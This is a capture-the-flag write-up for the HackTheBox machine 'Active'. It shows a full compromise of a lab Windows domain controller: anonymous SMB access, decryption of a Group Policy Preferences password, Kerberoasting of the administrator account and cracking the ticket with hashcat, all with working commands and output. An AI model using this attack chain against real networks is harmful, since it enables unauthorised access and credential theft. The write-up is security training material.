HackTheBox: Active
windows active-directory smb gpp as-rep-roasting impacket hashcatActive is a Windows-based machine authored by eks && mrb3n, with an average rating of 4.9 stars.
// Lessons Learned
- some crackmapexec scripts are unreliable in their output, and it’s good to know about alternative tools when this happens
- terminal commands AND powershell commands can be executed via SMB protocol! See the
-xand-Xflags
// Recon
┌──(kali㉿kali)-[~/HTB/active]
└─$ nmap -A -p- active.htb
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-09 15:25 AEST
Nmap scan report for active.htb (10.10.10.100)
Host is up (0.081s latency).
Not shown: 65491 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-05-09 08:44:14Z)
96/tcp filtered dixie
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
186/tcp filtered kis
366/tcp filtered odmr
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1856/tcp filtered fiorano-msgsvc
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
4861/tcp filtered unknown
5722/tcp open msrpc Microsoft Windows RPC
6587/tcp filtered unknown
9389/tcp open mc-nmf .NET Message Framing
13125/tcp filtered unknown
13757/tcp filtered unknown
17279/tcp filtered unknown
23339/tcp filtered unknown
23715/tcp filtered unknown
29613/tcp filtered unknown
30871/tcp filtered unknown
38166/tcp filtered unknown
39747/tcp filtered unknown
40433/tcp filtered unknown
42019/tcp filtered unknown
44286/tcp filtered unknown
45037/tcp filtered unknown
47629/tcp filtered unknown
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49169/tcp open msrpc Microsoft Windows RPC
49172/tcp open msrpc Microsoft Windows RPC
57333/tcp filtered unknown
62059/tcp filtered unknown
64478/tcp filtered unknown
65011/tcp filtered unknown
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-05-09T08:45:13
|_ start_date: 2022-05-09T05:26:36
|_clock-skew: 1m39s
| smb2-security-mode:
| 2.1:
|_ Message signing enabled and required
Nmap identifies the target as a Windows-based machine with a number of reachable services, including several that strongly indicate it’s a Domain Cotroller:
- kerberos on port
88and kerberos password change on464 - rpc on port
135, as well as rpc-over-http on port593 - ldap on ports
389(local domain) and3268(global catalog) - netbios & smb services on ports
139and445 - distributed file system replication (DFSR) on port
5722 - .NET message framing on port
9389
We don’t have any possible usernames or passwords at this stage, but one thing we can check the kerberos service for straight away is if the default administrator account exists and whether pre-authentication is required. If not, the account may be vulnerable to as-rep roasting:
┌──(kali㉿kali)-[~/HTB/active]
└─$ echo "administrator" > users.txt && impacket-GetNPUsers active.htb/ -dc-ip 10.10.10.100 -usersfile users.txt -format hashcat
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
The account exists, but is not vulnerable to the mentioned attack, so we’ll skip looking any further at kerberos for now. We can test the RPC service to see if any information is available without authentication, by passing an empty username (-U "") and indicating no password (-N) when executing rpcclient:
┌──(kali㉿kali)-[~/HTB/active]
└─$ rpcclient -U "" -N active.htb
rpcclient $>
With unauthenticated access available, we can run some basic commands to try and gain more information about the target. As normally happens without a privileged account though, only a limited number succeed:
# server info avaliable
rpcclient $> srvinfo
ACTIVE.HTB Wk Sv PDC Tim NT Domain Controller
platform_id : 500
os version : 6.1
server type : 0x80102b
# domain info unavailable
rpcclient $> querydominfo
Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED
# domain users unavailable
rpcclient $> enumdomusers
Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED
# domain groups unavailable
rpcclient $> enumdomgroups
Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED
Moving on to SMB, we can use crackmapexec to check if:
- null sessions are available (they’re not):
┌──(kali㉿kali)-[~/HTB/active] └─$ crackmapexec smb 10.10.10.100 -u '' -p '' SMB 10.10.10.100 445 DC [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False) SMB 10.10.10.100 445 DC [-] active.htb\: STATUS_ACCESS_DENIED - the
guestaccount has been disabled (it has):┌──(kali㉿kali)-[~/HTB/active] └─$ crackmapexec smb 10.10.10.100 -u 'guest' -p '' SMB 10.10.10.100 445 DC [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False) SMB 10.10.10.100 445 DC [-] active.htb\guest: STATUS_ACCOUNT_DISABLED
// Initial Foothold
Crackmapexec can supposedly test if anonymous access is enabled, by specifying a username of 'a' with an empty password (-u 'a' -p ''). However I’ve found this to be unreliable, instead preferring to use smbclient:
┌──(kali㉿kali)-[~/HTB/active]
└─$ smbclient -N -L \\\\active.htb
Anonymous login successful
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
None of the well-known shares of real interest (ADMIN$, C$ and Users) are available to us anonymously, but it seems we can access Replication:
┌──(kali㉿kali)-[~/HTB/active]
└─$ smbclient -N \\\\active.htb\\Replication
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Jul 21 20:37:44 2018
.. D 0 Sat Jul 21 20:37:44 2018
active.htb D 0 Sat Jul 21 20:37:44 2018
If we browse the active.htb folder, eventually we discover a file at \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml which we can easily download:
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (1.9 KiloBytes/sec) (average 1.9 KiloBytes/sec)
Viewing the file on our local machine, we get the following XML contents:
┌──(kali㉿kali)-[~/HTB/active]
└─$ cat Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
Groups.xml forms part of Group Policy Management, a Windows feature for managing user & computer configurations within an Active Directory network. On workstations we would expect to find this file in the SYSVOL mount, but as a domain controller this machine is using the Replication share as a means to spawn (replicate) another domain controller, with the same configuration. A function of a domain controller is to provide consistent and automatic configuration settings to new machines joining the network. In this case, each new machine should be configured with a SVC_TGS account, paired with the AES-256 encrypted password stored as cpassword. Under normal circumstances this would be relatively secure, but Microsoft accidentally published the encryption key in 2012, and it was hard-coded into software and not modifiable 🤦. Since AES encryption is symmetrical - the same key is used to encrypt and decrypt - any password encrypted using this key can now easily be decrypted, either manually or with the help of a utility like gpp-decrypt:
┌──(kali㉿kali)-[~/HTB/active]
└─$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
We can now re-test all of the open services using these new credentials, and we soon discover that they provide SMB access to the Users share:
┌──(kali㉿kali)-[~/HTB/active]
└─$ smbmap -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' -H active.htb
[+] IP: active.htb:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
Replication READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLY
Once we connect to the share, some basic browsing reveals the user key in the usual location:
┌──(kali㉿kali)-[~/HTB/active]
└─$ smbclient \\\\10.10.10.100\\Users -U SVC_TGS
Enter WORKGROUP\SVC_TGS's password:
Try "help" to get a list of possible commands.
smb: \> dir
. DR 0 Sun Jul 22 00:39:20 2018
.. DR 0 Sun Jul 22 00:39:20 2018
Administrator D 0 Mon Jul 16 20:14:21 2018
All Users DHSrn 0 Tue Jul 14 15:06:44 2009
Default DHR 0 Tue Jul 14 16:38:21 2009
Default User DHSrn 0 Tue Jul 14 15:06:44 2009
desktop.ini AHS 174 Tue Jul 14 14:57:55 2009
Public DR 0 Tue Jul 14 14:57:55 2009
SVC_TGS D 0 Sun Jul 22 01:16:32 2018
10459647 blocks of size 4096. 5725821 blocks available
smb: \> cd SVC_TGS\Desktop
smb: \SVC_TGS\Desktop\> dir
. D 0 Sun Jul 22 01:14:42 2018
.. D 0 Sun Jul 22 01:14:42 2018
user.txt AR 34 Mon May 9 15:27:38 2022
10459647 blocks of size 4096. 5725821 blocks available
smb: \SVC_TGS\Desktop\> get user.txt
getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \SVC_TGS\Desktop\> exit
┌──(kali㉿kali)-[~/HTB/active]
└─$ cat user.txt
48a3e***************************
// Privilege Escalation
While there may be more to access in the Users share, for now it’s worth checking what other services the SVC_TGS account can gain access to. The impacket scripts can support most of this, including:
- checking for Active Directory users (there doesn’t seem to be any):
┌──(kali㉿kali)-[~/HTB/active]
└─$ impacket-GetADUsers active.htb/SVC_TGS:GPPstillStandingStrong2k18
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Querying active.htb for information about domain.
Name Email PasswordLastSet LastLogon
-------------------- ------------------------------ ------------------- -------------------
- checking for UserSPNs (server principal names):
┌──(kali㉿kali)-[~/HTB/active]
└─$ impacket-GetUserSPNs -request active.htb/SVC_TGS:GPPstillStandingStrong2k18
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-19 05:06:40.351723 2022-05-09 15:27:46.045755
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$f0237303ddb747d0536e3e3f8219f414$36c3dc266b30a945173a9c351c1bdef35cf605838514dc30cd0e2b8773ec866063e9f3b362887f029aade8ae50e499c1a7fec6cda79934fee63054ca8735421d8720d389610baae9a2834589ad9e4449523bb7683bcf8c9ef24b0c6e89c0abf7ed879277a48635d2f3801e21a325f9859d6196463bf67a2d8541e4086dd216042cf4104f66a9280972711a2ec0d70ef369d9b0029112c9d609ca5f06f04b07a0b5be3f6431986c46f17c009a40c4649b8a9688a43790523cb1ee848068f736de012db287adbe9b96504cc83bf04af63b2ed8698d07278a73c1c0178d4e68495a56ea2b39e2db4fa840e2db7e93dee363fb0bccf9812787a5b95bd26f21ebec3fb9ace88bd341a19048d67f83282b8ad1f3b4434703eb8d58730214f2d58ec0a86b6e04d8c2800428747b088bb93f1e105e472443c2b4bcf07a5a595c809bd9161dc7e73f1c6f8edd87c1eb50a71abf62313f1076ef11ba661226c256425145a76754e2e686127764f343f827bce4bba24dc62497a354da10ceefbafd6ff70f7afb1d3c645aedc6d403f3637f697326bbe55a680c90cf5a672e221cd4812b0b9ae48fd5f16013ed97f8de3ab8dae2b0cb2cdcc9968fd8b8da8572b8a55dcf28b9a4aab32416db04637338c49d82959162b3330b1da459add95fdc64efb8cf676aabb0b445cd6b5135ea3eaebd33bccda736620a5add65d5b534406bdc457df4880eb007b7a07a438ded782f117b83a6101d7a3007a6a48d68b15ef71db8fd8df30b7b3642fe39bd535107b133ae160ee73c6eef1fcb14c5f917072d13738b19823bf46887c8852c0a94ad2f3b1233df87d55ae3b0b52ee4ac2be799983d401378ec1bbd6af17a06dd4d6e7caea6d2c16ecdcf1b785b3a407d7b4b1a091d5501d44481857b6c36febfb9a7fff1b32021236c93a70da4bce4dc12a15d027ac00d08f4b97028d04581861a4ea86594a98262fb48235207da3158132b694d4c904bf4402f19a6d25b3c0341feadad3427beb0b577bf061c6f449e08d4e065db30402a061e43f2008542913f239eae64575233658b361848e529859fec060c44ac679247c59b5e71f673d0cc992eb182ea66f2aaaad674cf4f9d1c6ec8efecf303813e4bfc9a83b227c4a22400f3ad2a90e8d511f5276eb0ddc2b133e03961697a3fcad619301d514366e974b136327ae6b7b3c383d4cefe8567951fa0decaccfc1fa0cf422a9aea5ca04b74eca46191ff2b66429e9d90483527cf8bfe
SPNs provide a means to associate a service with an account, in this case a user account (hence UserSPN). This is often done to enable a service to run with the permissions of an existing user, rather than configure them separately. Running impacket-GetUserSPNs with the -request argument instructs the tool to request a TGS (ticket granting service) ticket for the SPN, which is encrypted with the associated user’s key, in this case Administrator. This is an incredibly insecure setup, since we now have a hash that we can brute-force offline, and once cracked we will have the administrator’s password. All we have to do is copy the hash into a cifs.hash file and then put hashcat to work:
┌──(kali㉿kali)-[~/HTB/active]
└─$ hashcat --force -m 13100 -a 0 cifs.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.5) starting
You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.
OpenCL API (OpenCL 2.0 pocl 1.8 Linux, None+Asserts, RELOC, LLVM 11.1.0, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=====================================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i9-8950HK CPU @ 2.90GHz, 1428/2921 MB (512 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
...
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$f0237303ddb747d0536e3e3f8219f414$36c3dc266b30a...:Ticketmaster1968
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Ad...cf8bfe
Time.Started.....: Tue May 10 14:33:25 2022, (9 secs)
Time.Estimated...: Tue May 10 14:33:34 2022, (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1187.0 kH/s (0.49ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 10537984/14344385 (73.46%)
Rejected.........: 0/10537984 (0.00%)
Restore.Point....: 10536960/14344385 (73.46%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: Tiffany95 -> ThruJasonK21
Hardware.Mon.#1..: Util: 40%
Started: Tue May 10 14:33:06 2022
Stopped: Tue May 10 14:33:37 2022
We now have the administrator / Ticketmaster1968 login. Checking this user’s access to the server’s SMB shares reveals we now have access to the remaining shares:
┌──(kali㉿kali)-[~/HTB/active]
└─$ smbmap -u 'administrator' -p 'Ticketmaster1968' -H active.htb
[+] IP: active.htb:445 Name: unknown
[\] Work[!] Unable to remove test directory at \\active.htb\SYSVOL\SFLWBMPXQT, please remove manually
Disk Permissions Comment
---- ----------- -------
ADMIN$ READ, WRITE Remote Admin
C$ READ, WRITE Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ, WRITE Logon server share
Replication READ ONLY
SYSVOL READ, WRITE Logon server share
Users READ ONLY
Ultimately though, we can access the root flag through the Users share, in the usual location:
┌──(kali㉿kali)-[~/HTB/active]
└─$ smbclient \\\\active.htb\\Users -U administrator
Enter WORKGROUP\administrator's password:
Try "help" to get a list of possible commands.
smb: \> cd Administrator\Desktop
smb: \Administrator\Desktop\> dir
. DR 0 Fri Jan 22 02:49:47 2021
.. DR 0 Fri Jan 22 02:49:47 2021
desktop.ini AHS 282 Mon Jul 30 23:50:10 2018
root.txt AR 34 Mon May 9 15:27:38 2022
10459647 blocks of size 4096. 5725053 blocks available
smb: \Administrator\Desktop\> get root.txt
getting file \Administrator\Desktop\root.txt of size 34 as root.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \Administrator\Desktop\> exit
┌──(kali㉿kali)-[~/HTB/active]
└─$ cat root.txt
5f020***************************
